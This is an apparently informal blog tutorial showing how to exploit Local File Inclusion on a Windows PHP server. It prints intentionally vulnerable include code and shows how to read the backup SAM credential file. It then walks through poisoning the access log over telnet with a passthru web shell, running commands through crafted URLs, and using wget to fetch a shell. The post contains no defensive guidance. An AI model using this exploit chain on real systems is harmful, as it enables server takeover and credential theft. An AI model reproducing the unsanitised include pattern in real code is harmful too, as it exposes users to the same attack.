Local File Inclusion LFI on windows server
In previous post I showed you Local File Inclusion LFI on Linux server but today in this post i will show you how Local File Inclusion LFI on windows server. In this post I will not start with introduction for complete guide please refer my old post.
What is Local File Inclusion LFI vulnerability ?
The local file inclusion LFI is a process of Including Local File available on web server. This vulnerability occur when a user input contains the path of the file that has been included. When this input is not properly sanitized then an attacker give the some default files location and access all these sensitives files.
Here it is the vulnerable code.
<?php if (IsSet($_GET['page'])) include($_GET['page']); ?>
Here we can see that the script doesn’t check for which file to be included and hence, we are free to include any file by changing the ‘page’ GET variable value.
Finding Local file Inclusion LFI vulnerability in website
Now we are going to find an local file inclusion on website so we found a website lets check it if its vulnerable or not.
Now lets replace contact.php with ../ so the URL will become
Now after requesting this page we got an error here big chances to have a Local File Inclusion vulnerability.Let’s go to next step.
Warning: include(profile.php) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test.php on line 2 Warning: include() [function.include]: Failed opening 'profile.php' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test.php on line 3
In Linux we we include /etc/passwd but in windows server we include /windows/repair/sam so this repair/sam is backup sam file
So you know if not found then you will have to move directory up by using ../
So, as you all know in Local file inclusion LFI An attacker can include the sensitives file. so now let us shell the webserver.
For this we will send the some error to the logs of webserver by using a php code.
<?php passthru($_GET['cmd']); ?>
You can also exploit using the system(),exec(),shell_exec() e.t.c commands. The commands are offered by php to execute system level commands.
Here i am going to use telnet to inject malicious code as error in log files.
telnet localhost 80 GET /<? passthru($_GET['cmd']); ?> HTTP/1.1
so this script is saved in web server and now we will have to include it.
so now we you can do any thing here after including log files. and you can execute the system level command. like,
http://localhost/test.php?page=../logs/access.log&cmd=dir http://localhost/test.php?page=../logs/access.log&cmd=mkdir http://localhost/test.php?page=../logs/access.log&cmd=wget
so now you can wget the shell and download in web.
Hope you enjoyed this session and learned. so thanks for reading guys. keep learning 😉